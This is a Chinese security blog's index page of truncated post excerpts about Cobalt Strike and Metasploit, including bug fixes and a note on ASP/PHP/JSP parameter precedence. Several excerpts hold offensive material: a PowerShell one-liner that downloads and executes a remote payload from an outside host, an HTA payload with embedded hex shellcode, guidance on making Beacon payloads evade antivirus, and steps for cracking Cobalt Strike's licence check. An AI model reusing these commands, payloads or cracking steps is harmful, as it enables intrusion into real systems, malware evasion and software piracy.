CobaltStrike teamserver [The Parallel GC can not be combined with -XX:ParallelGCThreads=0]错误修复

RedFree | CobaltStrike, JAVA, Metasploit | 2017-05-16
CobaltStrike teamserver [The Parallel GC can not be combined with -XX:ParallelGCThreads=0]错误修复
问题:升级到1.8.0_131导致的Bug.问题反馈地址:https://twitter.com/armitagehacker/status/856993860366602241 官方博客提供的解决方案:https://blog.cobaltstrike.com/2017/04/26/java-startup-bug-in-java-1-8u131/ 在teamserver脚本中java执行命令后加上:-XX:ParallelGCThreads=8原文:If you recently updated your penetration testing enviro... [阅读全文]
ė6,273 次访问 6没有评论 0, ,

使用VB生成CobaltStrike Beacon类型的免杀Payload

RedFree | CobaltStrike, JAVA, Metasploit, VB | 2016-10-19
使用VB生成CobaltStrike Beacon类型的免杀Payload
CobaltStrike已提供了生成Microsoft office宏的功能,直接使用此功能生成对应载荷的宏代码,新建vb工程粘贴宏代码并去掉不相关注释即可。vb6.0代码如下:Private Type PROCESS_INFORMATION     hProcess As Long     hThread As Long     dwProcessId&n... [阅读全文]
ė113 次访问 6没有评论 0, , ,

CobaltStrike 3.x生成HTML应用程序(.hta)的三种类型

RedFree | CobaltStrike, JAVA, Metasploit, VB, Windows | 2016-10-19
CobaltStrike 3.x生成HTML应用程序(.hta)的三种类型
1、Executableevil.hta代码:<script language="VBScript">     Function var_func()         var_shellcode = "4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000000000000000000000000000000000... [阅读全文]

CobaltStrike 3.x远程调用脚本获取会话的4种模式

RedFree | CobaltStrike, JAVA, Metasploit, Python, Windows | 2016-10-19
CobaltStrike 3.x远程调用脚本获取会话的4种模式
在CobaltStrike 3.x中有4种远程调用脚本执行载荷的方法:1、Powershell远程调用命令:powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.118/rev'))"远程脚本内容:$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("... [阅读全文]

CobaltStrike 2.5无法交互执行cmd命令修复

RedFree | CobaltStrike, JAVA, Metasploit | 2016-10-18
CobaltStrike 2.5无法交互执行cmd命令修复
Metasploit 4.11.4版本之后msgpack进行了一次升级,导致CobaltStrike2.4和之前的版本都不能正常使用了。CobaltStrike 2.5对msgpack也进行了升级,但从此之后不能正常交互执行cmd命令了。报错信息如下: [-] Meterpreter 1 error while executing 'read 1': java.nio.charset.MalformedInputExcep... [阅读全文]
ė80 次访问 6没有评论 0, ,

ASP/PHP/JSP获取参数的顺序及参数叠加效果

RedFree | JAVA, PHP, Windows, 经验积累, 默认分类 | 2016-09-18
ASP/PHP/JSP获取参数的顺序及参数叠加效果
一、ASP代码<%response.write(request("id"))%>测试效果分析    ASP的GET参数比POST参数的优先级高,参数叠加提交最终会以逗号分割拼接。二、PHP代码<?php echo($_REQUEST['id']);?>测试效果分析PHP(php7)的POST参数优先级比GET高,参数叠加提交最终会使用最后一个参数值。三、JSP代码<%out.prin... [阅读全文]
ė82 次访问 6没有评论 0, ,

CobaltStrike 3.x破解方法

RedFree | CobaltStrike, JAVA | 2016-08-28
CobaltStrike 3.x破解方法
CobaltStrike 3.x的免费使用时间已经被编译到Common/License.class中,破解方法也十分简单。1、解压cobaltstrike.jar,然后使用java反编译工具jd-gui即可查看License.class反编译后的源代码。复制此文件反编译后的源码到License.java修改试用天数,并且放到Common目录中。2、删除原来的License.class,在Common目录打开命令行,输入javac -classpath ..... [阅读全文]
ė83 次访问 6没有评论 0,
Ɣ回顶部